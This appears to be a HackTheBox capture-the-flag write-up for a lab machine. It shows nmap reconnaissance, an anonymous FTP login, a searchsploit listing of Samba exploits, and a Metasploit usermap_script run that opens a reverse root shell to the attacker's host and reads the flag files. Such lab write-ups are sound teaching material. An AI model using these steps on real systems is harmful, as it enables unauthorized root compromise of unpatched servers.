This post is writeup of the HackTheBox machine created by ch4p.
Nmap
Nmap result
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-27 10:46 EDT
Nmap scan report for 10.10.10.3
Host is up (0.29s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.15
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.41 seconds
FTP
Connected via FTP, but it is empty.
# ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:vagrant): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
Searchsploit
Search vuln with Searchsploit
# searchsploit samba 3
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Microsoft Windows XP/2003 - Samba Share Resource Exhaustion (Denial of Service) | exploits/windows/dos/148.sh
Samba 1.9.19 - 'Password' Remote Buffer Overflow | exploits/linux/remote/20308.c
Samba 2.0.7 - SWAT Logfile Permissions | exploits/linux/local/20341.sh
Samba 2.0.7 - SWAT Logging Failure | exploits/unix/remote/20340.c
Samba 2.0.7 - SWAT Symlink (1) | exploits/linux/local/20338.c
Samba 2.0.7 - SWAT Symlink (2) | exploits/linux/local/20339.sh
Samba 2.2.2 < 2.2.6 - 'nttrans' Remote Buffer Overflow (Metasploit) (1) | exploits/linux/remote/16321.rb
Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation | exploits/linux/local/23674.txt
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit) | exploits/solaris_sparc/remote/16330.rb
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3) | exploits/unix/remote/22470.c
Samba 2.2.x - 'nttrans' Remote Overflow (Metasploit) | exploits/linux/remote/9936.rb
Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow | exploits/unix/remote/22356.c
Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | exploits/osx/remote/16875.rb
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | exploits/multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | exploits/unix/remote/16320.rb
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit) | exploits/linux/remote/9950.rb
Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | exploits/linux/remote/16859.rb
Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | exploits/solaris/remote/16329.rb
Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow | exploits/linux/dos/4732.c
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC) | exploits/multiple/dos/5712.pl
Samba 3.0.4 - SWAT Authorisation Buffer Overflow | exploits/linux/remote/364.pl
Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit) | exploits/linux_x86/remote/16860.rb
Samba 3.3.5 - Format String / Security Bypass | exploits/linux/remote/33053.txt
Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit) | exploits/linux/remote/21850.rb
Samba 3.4.5 - Symlink Directory Traversal | exploits/linux/remote/33599.txt
Samba 3.4.5 - Symlink Directory Traversal (Metasploit) | exploits/linux/remote/33598.rb
Samba 3.4.7/3.5.1 - Denial of Service | exploits/linux/dos/12588.txt
Samba 3.5.0 - Remote Code Execution | exploits/linux/remote/42060.py
Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit) | exploits/linux/remote/42084.rb
Samba 3.5.11/3.6.3 - Remote Code Execution | exploits/linux/remote/37834.py
Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow | exploits/linux/dos/27778.txt
Samba < 3.0.20 - Remote Heap Overflow | exploits/linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | exploits/linux_x86/dos/36741.py
Sambar FTP Server 6.4 - 'SIZE' Remote Denial of Service | exploits/windows/dos/2934.php
Sambar Server 4.3/4.4 Beta 3 - Search CGI | exploits/windows/remote/20223.txt
Sambar Server 5.1 - Script Source Disclosure | exploits/cgi/remote/21390.txt
Sambar Server 5.x - Information Disclosure | exploits/windows/remote/22434.txt
Sambar Server 6.0 - 'results.stm' POST Buffer Overflow | exploits/windows/dos/23664.py
Sambar Server 6.1 Beta 2 - 'showini.asp' Arbitrary File Access | exploits/windows/remote/24163.txt
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result
Server may use Linux(Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
)
We try to exploit for samba 3 < 4. I have tried these and found usermap_script works, so I use this.
Metasploit
UP msfconsole
# msfconsole
[-] ***Rting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***
______________________________________________________________________________
| |
| METASPLOIT CYBER MISSILE COMMAND V5 |
|______________________________________________________________________________|
\ / /
\ . / / x
\ / /
\ / + /
\ + / /
* / /
/ . /
X / / X
/ ###
/ # % #
/ ###
. /
. / . * .
/
*
+ *
^
#### __ __ __ ####### __ __ __ ####
#### / \ / \ / \ ########### / \ / \ / \ ####
################################################################################
################################################################################
# WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
https://metasploit.com
=[ metasploit v5.0.53-dev ]
+ -- --=[ 1931 exploits - 1079 auxiliary - 331 post ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP double handler on 10.10.14.15:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo fCTVcQOBqxECxNKZ;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "sh: line 3: Escape: command not found\r\nfCTVcQOBqxECxNKZ\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.15:4444 -> 10.10.10.3:55346) at 2019-10-27 11:25:59 -0400
pwd
/
id
uid=0(root) gid=0(root)
Okay, I got root shell. And got flag.
ls /home/makis
user.txt
cat /home/makis/user.txt
ls /root
Desktop
reset_logs.sh
root.txt
vnc.log
cat root.txt
cat /root/root.txt
Summary
- Apply security patches early